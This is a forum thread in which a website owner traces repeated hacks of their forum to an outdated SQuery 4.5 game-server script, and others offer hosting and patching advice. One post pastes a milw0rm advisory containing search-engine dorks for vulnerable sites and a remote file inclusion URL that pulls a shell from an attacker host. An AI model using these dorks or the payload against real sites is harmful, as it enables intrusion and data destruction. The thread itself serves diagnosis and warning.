GFXINDIA.COM HACKED

[GeofMauser]

Are you running any other scripts on your site? Like a gallery or anything?

Not IchBin, no one other script.

Thank you for you answer. I speaked a lot with the host provider, and he say that my php's files are the problem because all others users have not problems in the host, include him, that have you ouwner web site and never nobody can delete files.

I am only searching for a info, maybe this host provider lie about it, and my php's are not insecure, only i am searching a lot of info for can stop de hacks attacs. I love this system and cannot change it for another, i need stop hacks only.

[akulion]

change hosts seriously

ur host is probably not secure and they dont know it themselves

because if this was a problem with SMf or TP then u would see ALL our sites getting hacked left right and center until SMF and TP ceased to exist

[GeofMauser]

akulion, you have right i think.

[GeofMauser]

Squery 4.5, this is the Key.

Warning with this script for Query Game Servers.

[akulion]

any more details on that?

so we can prevent it happening to us as well

[robert420]

When most people hack site the use a shell script to get access to SMF,PHPBB,VBulletin, and MyBB other forum boards when finding a host you should always make sure your going to be secure on a good hosting server lots of hosting server say there secured when they really ain't they just want customer & the money if you have a hosting with a live support system ask the staff working on the live support system is your server secured if they yeah double check by finding security scripts on google.com the most unsecured hosting is free hosting companys

[IchBin]

Squery 4.5, this is the Key.

Warning with this script for Query Game Servers.

I asked you if you were running other scripts and you said no?

Then what are you saying Squery for?

[GeofMauser]

any more details on that?

so we can prevent it happening to us as well

Squery, game server query script, version 4.5 or less have a high security xploit in folder Lib, and i various php files as "gore.php":

=================================================================
SQuery <= 4.5(libpath) Remote File Inclusion Exploit           
=================================================================
Worked On : ALL VERSIONS                                         |
                                                                 |
Critical Level : Dangerous                                       |
                                                                 |
Gug Found In : gore.php                                          |
=================================================================
Dork :  "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" | inurl:"modules.php?name=SQuery"

http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?
===============================================================================
Discoverd By : SHiKaA
Conatact : SHiKaA-[at]hotmail.com

GreetZ :  BlAcK_BiRd  Kambaa  NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA Kosho-Man 3amer and #ALL MEMBER OF EL SLAM-CITY
=================================================================

# milw0rm.com [2006-07-10]



PD:
And this was my problem, since i delete the Squery, the hackers stop to attak for now.

[GeofMauser]

Squery 4.5, this is the Key.

Warning with this script for Query Game Servers.

I asked you if you were running other scripts and you said no?

Then what are you saying Squery for?

I forggot that Squery was in my site IchBin. Last night i was uploading a few folders in my domain, witouh SMF and TP installed, for can see if the hack way was in others points. Then, the hacker delete all my root direcotry again, and the Squey, was one of the folder "test" that i was uploading. Then, inmediatly i was going to search info in web, and instantly the google say a lot of links wiith sSQUERY SECURITY problem.

[redone]

My "hacks" are not that sophiscated and often involve explotation of old or insecure scripts.

Most of us can avoid such attacks by keeping your scripts up to date, changing your username and passwords often. Basic security is the key in most cases.

A good host who knows how to secure and run server is also vital.